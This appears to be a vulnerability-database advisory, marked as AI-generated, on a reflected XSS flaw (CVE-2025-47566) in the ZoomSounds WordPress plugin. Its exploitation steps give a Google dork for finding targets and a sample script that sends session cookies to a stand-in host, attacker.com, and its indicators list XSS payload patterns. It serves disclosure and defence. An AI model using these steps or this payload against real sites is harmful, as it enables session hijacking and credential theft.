CVE-2025-47566
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-47566 is a Reflected Cross-Site Scripting (XSS) vulnerability in the ZoomSounds WordPress plugin (also known as dzs-zoomsounds) that allows unauthenticated attackers to inject malicious scripts into web pages viewed by other users. The vulnerability affects ZoomSounds versions up to and including 6.91, with no official patch available as of the time of reporting. It was reported by Tran Nguyen Bao Khanh (VCI - VNPT Cyber Immunity) on March 25, 2025, and published by Patchstack on June 3, 2025, with the CVE formally recorded on December 31, 2025. The vulnerability carries a CVSS v3.1 base score of 7.1 (High), as assigned by Patchstack (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. User-supplied input is not properly sanitized or encoded before being reflected back in the HTTP response, allowing an attacker to craft a malicious URL containing JavaScript payloads that execute in the victim's browser upon visiting the link. Exploitation requires no authentication (unauthenticated privilege level) but does require user interaction — a privileged user must be socially engineered into clicking a crafted link or visiting a malicious page. The vulnerability is categorized under OWASP Top 10 A3: Injection (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim (such as administrative actions if an admin clicks the malicious link), redirection to phishing pages, or delivery of malware. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, affecting the browser environment of any user who interacts with the crafted link (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the ZoomSounds plugin (version ≤ 6.91) using tools like WPScan, Shodan, or Google dorks targeting plugin-specific file paths (e.g., inurl:/wp-content/plugins/dzs-zoomsounds/).
  2. Identify vulnerable parameter: Locate the specific URL parameter(s) within the ZoomSounds plugin that reflect unsanitized user input back in the HTTP response without proper encoding.
  3. Craft malicious payload: Construct a URL containing a reflected XSS payload in the vulnerable parameter, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or similar JavaScript designed to steal session cookies or perform actions on behalf of the victim.
  4. Deliver the payload: Send the crafted URL to a target user (e.g., a WordPress administrator) via phishing email, social media message, or other social engineering vector, enticing them to click the link.
  5. Achieve objective: When the victim clicks the link and their browser loads the page, the injected script executes in their browser context, potentially stealing session cookies, performing administrative actions, or redirecting the victim to a malicious site (Patchstack).

Indicators of compromise

  • Network: HTTP GET or POST requests to ZoomSounds plugin endpoints containing URL-encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload=) in query parameters; unusual outbound connections from the web server to unknown external IPs following user interaction with plugin pages.
  • Logs: Web server access logs showing requests to ZoomSounds plugin URLs with suspicious parameter values containing HTML/JavaScript tags or encoded equivalents (e.g., %3Cscript%3E, %22, %27); repeated requests from different IPs to the same vulnerable endpoint suggesting automated scanning.
  • File System: Unexpected new files or modifications to WordPress core/plugin files that could indicate follow-on compromise after session hijacking (e.g., new admin accounts, modified theme files with backdoors).
  • Browser/Application: Reports from users of unexpected redirects, pop-ups, or unusual behavior when visiting pages that use the ZoomSounds plugin.

Mitigation and workarounds

As of the time of reporting, no official patch has been released by the ZoomSounds plugin developer for versions up to and including 6.91. Site administrators should monitor the WordPress plugin repository for an updated version and apply it immediately when available. As an interim measure, Patchstack has issued a virtual patching rule for its subscribers that blocks exploitation attempts without requiring a code-level fix. If the plugin is not essential, consider deactivating and removing it until a patch is released. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation risk (Patchstack).

Community reactions

The vulnerability was discovered and disclosed through Patchstack's Vulnerability Disclosure Program (VDP), with credit given to researcher Tran Nguyen Bao Khanh from VCI - VNPT Cyber Immunity. The CVE was noted on social media platforms including Bluesky, and aggregated by several vulnerability tracking services. No significant vendor statements or major media coverage beyond standard vulnerability database entries have been identified (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15991HIGH8.8
  • file-manager
NoYesAug 06, 2026
CVE-2026-15459HIGH8.1
  • wpmudev-updates
NoYesAug 06, 2026
CVE-2026-7529HIGH7.5
  • wisecampaign
NoYesAug 05, 2026
CVE-2026-18325HIGH7.2
  • forminator
NoYesAug 06, 2026
CVE-2026-16636HIGH7.2
  • fluent-smtp
NoYesAug 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management